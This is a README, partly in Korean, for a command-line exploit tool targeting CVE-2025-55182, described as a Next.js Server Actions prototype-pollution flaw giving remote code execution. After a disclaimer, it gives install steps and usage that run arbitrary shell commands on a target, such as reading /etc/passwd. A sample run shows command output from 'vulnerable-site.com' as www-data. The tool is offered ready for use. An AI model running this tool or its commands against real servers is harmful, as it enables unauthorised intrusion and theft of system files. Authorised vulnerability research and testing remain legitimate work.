
CVE-2025-55182 Next.js RCE Exploit Tool
[!CAUTION]
⚠️ 면책 조항 - 사용 전 읽어주세요
이 도구는 다음 용도로만 사용해야 합니다:
- 보안 연구원의 취약점 검증
- 명시적 허가를 받은 공인된 침투 테스트
- 교육 및 학습 목적
컴퓨터 시스템에 대한 무단 접근은 불법입니다.
이 도구를 사용함으로써 다음 사항에 동의하는 것으로 간주됩니다:
- 시스템을 테스트하기 전에 적절한 승인을 받았습니다.
- 이 도구를 악의적인 목적으로 사용하지 않습니다.
- 본인의 행동과 그로 인한 모든 결과에 대한 책임은 전적으로 본인에게 있습니다.
저자는 이 도구의 오용에 대해 어떠한 책임도 지지 않습니다.
Next.js 서버 측 프로토타입 오염 취약점에 대한 원격 코드 실행(RCE) 익스플로잇 도구입니다.
CVE-2025-55182는 Next.js에 영향을 미치는 심각한 보안 취약점으로, 공격자가 프로토타입 오염을 악용한 특수 제작된 요청을 통해 원격 코드 실행을 달성할 수 있습니다.
📖 자세한 기술 분석은 EXPLOIT.md를 참조하세요.
이 취약점은 Next.js Server Actions 요청 처리 메커니즘을 악용하여, __proto__ 프로토타입 체인 오염과 Function 생성자를 결합해 임의 코드 실행을 달성합니다.
# Using yarn
yarn install
# Using npm
npm install
# Basic usage
node index.js <target_url> [command]
# Examples
node index.js http://localhost:3000
node index.js http://localhost:3000 "ls -la"
node index.js http://localhost:3000 "cat /etc/passwd"
# Run the tool
yarn start http://localhost:3000 "whoami"
# Or use alias
yarn exploit http://localhost:3000 "ls -la"
# Show help
yarn help
# Link globally
yarn link
# or
npm link
# Then use the command directly
cve-2025-55182 http://localhost:3000
cve-2025-55182 http://localhost:3000 "whoami"
# Unlink
yarn unlink
Usage:
cve-2025-55182 <url> [command]
Arguments:
url Target URL (required)
command Command to execute (default: whoami)
Options:
-h, --help Show help message
-v, --version Show version number
이 도구는 JSON 형식으로 결과를 출력합니다:
{
"success": true,
"message": "",
"data": "command execution result"
}
{
"success": false,
"message": "error message",
"data": null
}
$ cve-2025-55182 http://vulnerable-site.com "id"
{
"success": true,
"message": "",
"data": "uid=1000(www-data) gid=1000(www-data) groups=1000(www-data)"
}